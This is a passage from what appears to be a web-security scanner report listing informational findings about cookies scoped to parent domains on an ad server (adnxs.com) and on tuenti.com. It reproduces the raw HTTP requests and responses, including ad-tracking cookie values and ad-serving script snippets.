Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb261605=5_[r^kI/7ZrO@Pn0nf8M8*^ck?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiPyPsVQiJOiRCBWHfHSmrEEICgjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAAGwkBAgUCAAUAAAAAYR-m3gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295483394%29%3Buf%28%27r%27%2C+151608%2C+1295483394%29%3Bppv%2882%2C+%274765998665889606691%27%2C+1295483394%2C+1305851394%2C+2132%2C+23869%29%3Bppv%2884%2C+%274765998665889606691%27%2C+1295483394%2C+1305851394%2C+2132%2C+23869%29%3Bppv%2811%2C+%274765998665889606691%27%2C+1295483394%2C+1305851394%2C+2132%2C+23869%29%3Bppv%2882%2C+%274765998665889606691%27%2C+1295483394%2C+1305851394%2C+2132%2C+23869%29%3Bppv%2884%2C+%274765998665889606691%27%2C+1295483394%2C+1305851394%2C+2132%2C+23869%29%3Bppv%2887%2C+%274765998665889606691%27%2C+1295483394%2C+1295569794%2C+2132%2C+23869%29%3Bppv%28619%2C+%274765998665889606691%27%2C+1295483394%2C+1295569794%2C+2132%2C+23869%29%3Bppv%28620%2C+%274765998665889606691%27%2C+1295483394%2C+1295569794%2C+2132%2C+23869%29%3Bppv%28621%2C+%274765998665889606691%27%2C+1295483394%2C+1295569794%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTPg<>4lhRUC(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTwzHPZ2[uGVGi2$WVP]vE7ilpu2(MPy%SF(w77BERA(EO4I(3<csJ3xssMeZG!9KUs%nl<0; path=/; expires=Wed, 20-Apr-2011 00:29:54 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:29:54 GMT
Content-Length: 402

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-82053649_1295482372,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l;;cmw=owl;sz=728x90;net=c
...[SNIP]...

7.24. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.martini&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-69155988_1295482815%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.sports_l-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D777061%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sports_l%3Bbtg%3Dcm.weath_l%3Bord%3D1768089178%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; acb35548=5_[r^kI/7ZrO@Pn0nf8M8cp]i?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP1729trACfBsBWHfHSmrEEIEfjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA6AgBAgUCAAUAAAAA3yJj0gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482372%29%3Buf%28%27r%27%2C+151608%2C+1295482372%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2811%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2887%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28619%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28620%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28621%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<cvjr/?0P(*AuB-u**g1:XIC8]UMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]n@)*InD4_+

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb35548=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]nOpI=48$^Tx()%_!wzkF2Ple$; path=/; expires=Wed, 20-Apr-2011 00:20:15 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:20:15 GMT
Content-Length: 517

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-69155988_1295482815,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sports_l-cm.weath_l;;cmw=owl;sz=
...[SNIP]...

7.25. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.martini&size=160x600&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-93054228_1295482822%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D405617%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sports_l%3Bbtg%3Dcm.weath_l%3Bord%3D423951444%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; acb303093=5_[r^XI()vrO@Pn0nf8MwM9g$?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviP9CL-hxz-rYyBWHfHSmrEELBfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAeggBAgUCAAUAAAAALyC12AAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482817%29%3Buf%28%27r%27%2C+151609%2C+1295482817%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2811%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2887%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28619%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28620%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28621%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)hgVCgQw>7'NF7uNVkG0XN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(LG%y$qg]mwnXkD%rDs0:0$Ob('INuCClbQ^7w=g32LzAgGCPGs/^Zf3+TaP

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:30:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:30:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb113196=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb303093=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:30:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb88891=5_[r^XI()vrO@Pn0nf8M?mCw(?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviPw-KkW6pUP1vBWHfHSmrEEIXgjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAigQBAgUCAAUAAAAAyx6YZAAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295483415%29%3Buf%28%27r%27%2C+151609%2C+1295483415%29%3Bppv%2882%2C+%278069694795952523791%27%2C+1295483415%2C+1305851415%2C+2132%2C+23869%29%3Bppv%2884%2C+%278069694795952523791%27%2C+1295483415%2C+1305851415%2C+2132%2C+23869%29%3Bppv%2811%2C+%278069694795952523791%27%2C+1295483415%2C+1305851415%2C+2132%2C+23869%29%3Bppv%2882%2C+%278069694795952523791%27%2C+1295483415%2C+1305851415%2C+2132%2C+23869%29%3Bppv%2884%2C+%278069694795952523791%27%2C+1295483415%2C+1305851415%2C+2132%2C+23869%29%3Bppv%2887%2C+%278069694795952523791%27%2C+1295483415%2C+1295569815%2C+2132%2C+23869%29%3Bppv%28619%2C+%278069694795952523791%27%2C+1295483415%2C+1295569815%2C+2132%2C+23869%29%3Bppv%28620%2C+%278069694795952523791%27%2C+1295483415%2C+1295569815%2C+2132%2C+23869%29%3Bppv%28621%2C+%278069694795952523791%27%2C+1295483415%2C+1295569815%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:30:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:30:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)'qHqWd-AGmScENVx-p:Y9b66ZCJLN[8yvY$hcwDwhp^RbpUUZcwln=gw`]wKC0A)'9Dj6XfCjr1`pXWX!Zug7w[D'0P+4t(R':*^j@d'/O'8DQO*(j)bjW#>; path=/; expires=Wed, 20-Apr-2011 00:30:15 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:30:15 GMT
Content-Length: 504

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l
...[SNIP]...

7.26. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add_code=impx-11265&member=30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; acb35548=5_[r^kI/7ZrO@Pn0nf8M8cp]i?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP1729trACfBsBWHfHSmrEEIEfjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA6AgBAgUCAAUAAAAA3yJj0gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482372%29%3Buf%28%27r%27%2C+151608%2C+1295482372%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2811%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2887%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28619%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28620%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28621%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTwzHPZ2[uGVGi2$WVP]vE7ilpu2(MPy%SF(w77BERA(EO4I(3<csJ3xssMeZG!7<'>q5Yjf

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:13:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:13:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:13:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG3H<cvjr/?0P(*AuB-u**g1:XIC8]UMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]n@)*InD4_+; path=/; expires=Wed, 20-Apr-2011 00:13:37 GMT; domain=.adnxs.com; HttpOnly
Location: http://r.openx.net/set?pid=408c9df8-85fe-6893-4938-ccbfd204601e&rtb=4760492999213801733
Date: Thu, 20 Jan 2011 00:13:37 GMT
Content-Length: 0


7.27. http://www.tuenti.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tuenti.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tuenti.com
Proxy-Connection: keep-alive
Referer: http://www.tuenti.com/share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ourl=%3Fm%3DShare%26url%3Dhttp%253A%252F%252Fwww.elmundo.es%252Felmundo%252F2011%252F01%252F17%252Fnautica%252F1295254542.html%26p%3D; keep_ru=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ourl=deleted; expires=Wed, 20-Jan-2010 14:11:43 GMT; path=/; domain=.tuenti.com
Set-Cookie: manual_logout=deleted; expires=Wed, 20-Jan-2010 14:11:43 GMT; path=/; domain=.tuenti.com
X-Tuenti-State: logout
Vary: Accept-Encoding
Connection: close
Date: Thu, 20 Jan 2011 14:11:44 GMT
Content-Length: 1630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-equiv="
...[SNIP]...

7.28. http://www.tuenti.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tuenti.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?m=login HTTP/1.1
Host: www.tuenti.com
Proxy-Connection: keep-alive
Referer: http://www.tuenti.com/?gotHash=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: keep_ru=1; ourl=%3F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Set-Cookie: ond=deleted; expires=Wed, 20-Jan-2010 14:11:44 GMT; path=/; domain=.tuenti.com
Set-Cookie: ue=deleted; expires=Wed, 20-Jan-2010 14:11:44 GMT; path=/; domain=.tuenti.com
Set-Cookie: manual_logout=deleted; expires=Wed, 20-Jan-2010 14:11:44 GMT; path=/; domain=.tuenti.com
Set-Cookie: ond=deleted; expires=Wed, 20-Jan-2010 14:11:44 GMT; path=/; domain=.tuenti.com
Set-Cookie: ue=deleted; expires=Wed, 20-Jan-2010 14:11:44 GMT; path=/; domain=.tuenti.com
Set-Cookie: em=deleted; expires=Wed, 20-Jan-2010 14:11:44 GMT; path=/; domain=.tuenti.com
Set-Cookie: fa=deleted; expires=Wed, 20-Jan-2010 14:11:44 GMT; path=/; domain=.tuenti.com
Set-Cookie: et=deleted; expires=Wed, 20-Jan-2010 14:11:44 GMT; path=/; domain=.tuenti.com
Content-Type: text/html
Vary: Accept-Encoding
Connection: close
Date: Thu, 20 Jan 2011 14:11:45 GMT
Content-Length: 23439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...

7.29. http://www.tuenti.com/share  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tuenti.com
Path:   /share

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ond=deleted; expires=Wed, 20-Jan-2010 00:51:22 GMT; path=/; domain=.tuenti.com
Set-Cookie: ourl=%3Fm%3DShare%26url%3Dhttp%253A%252F%252Fwww.elmundo.es%252Felmundo%252F2011%252F01%252F17%252Fnautica%252F1295254542.html%26p%3D; path=/; domain=.tuenti.com
Set-Cookie: keep_ru=1; path=/; domain=.tuenti.com
